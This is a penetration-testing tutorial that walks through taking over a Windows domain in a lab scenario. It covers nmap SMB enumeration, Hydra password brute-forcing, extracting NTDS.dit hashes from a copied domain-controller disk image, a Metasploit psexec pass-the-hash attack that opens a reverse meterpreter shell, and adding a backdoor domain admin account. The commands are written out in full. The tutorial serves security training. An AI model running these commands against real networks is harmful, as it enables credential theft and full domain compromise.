Grey Box Pentesting Scenario
Gray-Box Penetration Testing Scenario:
1. What will you learn?!
In this article you will learn how to fully compromise a domain environment without exploiting any vulnerability.
The following article will lead you in details to:
- Use nmap scripts for smb service
- Use Hydra to brute-force an account over smb service
- extract the ntds.dit from VDI
- use metasploit with pass-the-hash technique
- Post exploitation in the enterprise environment
2. Identify the live hosts and the main services
The most important thing you must keep in mind in your penetration test is the scope, here in our scenario the scope of the penetration test is 20 IP addresses in the IT Department.
IP range will start from 192.168.100.10-30.
Figure 1: Simple network diagram for the scenario
By reviewing the engagement rules it’s easy to identify that they put the IT admins with the servers zone which is a vulnerability in the network design and it is recommended to make IT admins in the same zone of the core network servers. My recommendation is to make IT admins in a separate zone and put a tuned firewall between them based on the functions of the admins.
The other important thing in your penetration test is the methodology. Stick to your methodology and try to avoid skipping steps or jumping to other steps. It is highly recommended to stick to the methodology to finish your project on time
Hopefully, we will start our penetration testing project with a vulnerability.
Username PENTEST was created with normal privilege to be used only for this activity.
One of the most powerful tools in the penetration testing process is nmap. In the following steps we will use nmap with the SMB scripts to collect all the information about this domain. So let’s start by identifying the live hosts and services running on them
|#nmap –sP <Target-IPs>|
We will put our findings of the live hosts in the file Targets.txt.
Now we will run nmap with more options to identify the services up on these hosts and the version of the services
|#nmap -sV -sC -iL Targets.txt|
Here we go, from this output we can identify various information
- These servers are running windows server 2008 R2 Enterprise 6.1
- Domain name is pentest.corp.local
- Computer names are PCL-DC-01 and PCL-FTP-01
- There are some interesting services DNS,SMB,LDAP and RPC over HTTP
3. Starting with enumerating users using smb services
In this scenario we will focus on SMB service by using a few nmap scripts to get more information.
We will use our user PENTEST to get more information. We will start by enumerating the domain users using the following script:
|#nmap –script smb-enum-users.nse –script-args=smbuser=pentest,smbpass=P@ssw0rd -p445 -n -iL Targets.txt|
From the output we can easly identify the users in this domain as follows:
- Administrator, ftpuser, Guest, krbtgt, nuser, pentest
All these users are working except the guest and krbtgt, so we will save the other usernames in a file UserNames.txt
Enumerating share folders in this domain by using the following script
|#nmap –script smb-enum-shares.nse –script-args=smbuser=pentest,smbpass=P@ssw0rd -p445 -n -iL Targets.txt|
So the shared folders on 192.168.100.10 are:
- ADMIN$, C$, IPC$, NETLOGON, SYSVOL
there are also shared folders on 192.168.100.11:
- ADMIN$, C$, IPC$
What we have found at this point is enough in our secenario to start discovering how to capture the flag and gain full privileges on this domain.
4. After enumerating users, Fire Brute-force
In this section we will build a custom dictionary password attack based on the information we discovered from this domain.
I have used some guessing words to start the password file Pass.txt then I used john-the-ripper to build my list Passwords.lst
|#john –wordlist=Pass.txt –rules –stdout > Passwords.lst|
Then, I use hydra to start brute-forcing the accounts I found during the enumeration phase
|#hydra -L UserNames.txt -P Passwords.txt -M Targets.txt -t 96|
I found another user, Ftpuser with password ftpP@ssw0rd that has a successful login into 192.168.100.11. Try to connect to the server using remote desktop with Ftpuser
Figure 2: use remote desktop connection to connect to FTP server
After successfully logging into 192.168.100.11 we start gathering all the information inside this server. After awhile we found a VHD file PCL-DC-01.VHD.
This file seems to be the backup of the domain controller; this was my first thought when I saw this file.
We will mount this partition to our machine then copy the PCL-DC-01.VHD
|# mount -t cifs 192.168.100.11:/C$ -o username=ftpuser,password=ftpP@ssw0rd /mnt/FTP/|
If you use KALI LINUX you will need to install this package before running the mount command
|#apt-get install cifs-utils|
Figure 3: fond PCL-DC-01.VHD file
5. Mount the VHD file and get the NTDS, SYSTEM, SAM and Config files
If you want to mount the Virtual Box drive image (VDI) in Ubuntu 12.04/12.10 use vdfuse. This Fuse module uses the Virtual Box access library to open a Virtual Box supported VD image file and mount it as a Fuse file system. The mount point contains a flat directory containing the files EntireDisk, Partition1… PartitionN. These can then be loop mounted to access the underlying file systems.
To install vdfuse on KALI Linux run the following command
|# apt-get install virtualbox-fuse|
To mount the VDI file use the following instructions:
- Mount the VDI file into mount point
- By navigating to the mount point you will find the EntireDisk ,Partition1 and Partition2
- Mount partition2 to another point
- Navigate to that point to find the C: partition
We will make directory NTDS
Now we will copy the NTDS folder from the mounted VDI file PCL-DC-01.VDI which contains the active directory database for the pentest.corp.local domain.
Also, we will need the SAM, SECURITY and SYSTEM files form <mount-point>/windows/system32/config/ folder.
6. Dump the NTDS database and get the users hashes
First download the libesedb libraries from 8.1
Extract and compile the libesedb libraries using the following commands:
Second, download the NTDSXtract framework from 8.2
This framework was developed in order to provide the community with a solution to extract forensically important information from the main database of Microsoft Active Directory (NTDS.DIT).
The modules are capable of extracting information from NTDS.DIT files obtained from the following Windows versions:
- Windows Server 2003 (32 & 64 bit)
- Windows Server 2008 (32 & 64 bit)
The code is written in python and tested on the following platforms:
The framework is capable of extracting information related to:
- user objects
- group objects
- computer objects
- deleted objects
b. NTDSXtract Modules
Currently the following modules are included in the NTDSXtract framework:
- dsfileinformation.py (time and date information related to the NTDS.DIT database file)
- dstimeline.py (timeline generation module)
- dsdeletedobjects.py (module that can extract information related to deleted objects)
- dsusers.py (extracts information related to user objects)
- dsgroups.py (extracts information related to group objects)
- dscomputers.py (extracts information related to computer objects)
You can find more information here 8.3
c. esedbexport script
esedbexport is used to export items stored in an Extensible Storage Engine (ESE) Database (EDB) file
After installing the libesedb libraries, extract the database tables from ntds.dit using esedbexport script.
|# esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit extracted_ntds.dit|
d. Use NTDSXtract dsusers.py module:
Extract the hashes/user info/password history:
|# python dsusers.py /tmp/ntds.dit.export/datatable /tmp/ntds.dit.export/link_table –passwordhashes <SYSTEM file> –passwordhistory <SYSTEM file> –certificates –supplcreds <SYSTEM file> –membership > ntds.dit.output|
Note: the link_table id could be link_table.[number] or link_table.[number] depending on the previous output
Filter the hashes from the ntds.dit.output using the following command:
|# grep -A 1 “Password hashes:” ntds.dit.output | grep “^[[:blank:]]”|
e. Use metasploit ntds_hashextract.rb module:
Download the metsploit module to extract the usernames and hashes from datatable.3 directly from here 8.4
|#/usr/share/metasploit-framework/tools/./ntds_hashextract.rb /tmp/ntds.dit.export/datatable.3 <SYSTEM file>|
Now we are interested in the Administrator account. You have all the accounts with their hashes. You can try cracking those hashes but it could take much more time than required for this process.
In the following section we will use pass the hash technique to use those hashes without cracking the passwords.
7. Go to the metasploit use psexec with pass-the-hash technique
Warm up your hands as we get ready to capture the flag. Run metasploit and use the psexec module as follows
|msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set RHOST 192.168.100.10msf exploit(psexec) > set SMBDomain pentest.corp.local
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:f40b71a29d7723b7cb7e64a8d184dec4
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.100.102
msf exploit(psexec) > exploit
Congratulations, in figure 3 you can see that pass-the-hash technique worked and we have a reverse meterpreter session on the domain controller server
Figure 4: metsploit psexec module exploited and we got reverse meterpreter session
8. Post Exploitation and add new user and make it domain admin
Post exploitation in penetration testing can use a lot of different techniques to gather information about the network environment and could lead to more exploitation in the domain.
One of the most important steps after getting the meterpreter is to get the system privilege and migrate to a stable service.
In this section I will illustrate how to add a new account to the domain administrator to maintain your access to the pentest.corp.local domain
In figure 5 you can see that I added a new user pentestAdmin to the domain. Then, I list all the groups inside this domain controller. Finally, I add pentestAdmin to the domain admins to maintain my access to the domain pentest.corp.local.
Figure 5: post exploitation: add username to the domain users then add the user to the domain admins group
All information in this article is from a real penetration testing scenario. Some of the steps in the article are straight forward; maybe you will need more skills to bypass some restrictions like the antivirus, host intrusion prevention system and firewalls.
It is advised that the most important part of penetration testing is the reconnaissance and mapping phase. The more information you gather during the penetration testing activity means the higher possibility of capturing the flag and compromising the network.
11. About the author
Basem Helmy| ECSA/LPT
He is an information Security Engineer specialist in offensive security track. He is a specialist in penetration testing for network and web applications in highly secured environments with more than 3 years experience.